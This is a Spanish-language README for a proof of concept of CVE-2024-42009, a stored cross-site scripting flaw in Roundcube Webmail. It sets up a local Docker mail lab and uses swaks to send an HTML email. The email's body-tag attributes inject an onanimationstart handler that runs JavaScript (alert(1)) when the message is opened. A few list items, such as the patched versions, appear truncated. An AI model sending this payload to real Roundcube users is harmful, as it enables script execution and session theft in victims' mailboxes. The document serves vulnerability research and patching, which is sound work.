
Este repositorio demuestra una Prueba de Concepto (PoC) funcional para CVE-2024-42009, una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en Roundcube Webmail.
La vulnerabilidad es causada por una sanitización HTML inadecuada seguida de un reprocesamiento inseguro de atributos, lo que permite a los atacantes inyectar manejadores de eventos maliciosos a través de correos electrónicos HTML manipulados.
Roundcube sanitiza los correos HTML entrantes pero luego vuelve a procesar ciertos atributos (por ejemplo, bgcolor, atributos malformados), lo que conduce a:
onanimationstart)Esto permite la ejecución de JavaScript arbitrario cuando una víctima abre un correo malicioso.
git clone https://github.com/ZaidArif47/CVE-2024-42009-PoC.git
cd CVE-2024-42009-PoC
docker compose up -d
⏳ Espera ~10–15 segundos a que el servidor de correo se inicialice.
docker exec mailserver setup email add [email protected] 'attacker123'
docker exec mailserver setup email add [email protected] 'victim123'
http://localhost:8080
Credenciales:
Envía el correo malicioso usando la herramienta swaks:
swaks --to [email protected] \
--from [email protected] \
--server localhost:2525 \
--header "Content-Type: text/html; charset=utf-8" \
--header "Subject: CVE-2024-42009 PoC" \
--body '<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=alert(1) foo=bar">Foo</body>'


Actualiza a las versiones parcheadas:
Este proyecto es solo para fines educativos y de investigación de seguridad autorizada. No lo utilices contra sistemas sin el permiso adecuado.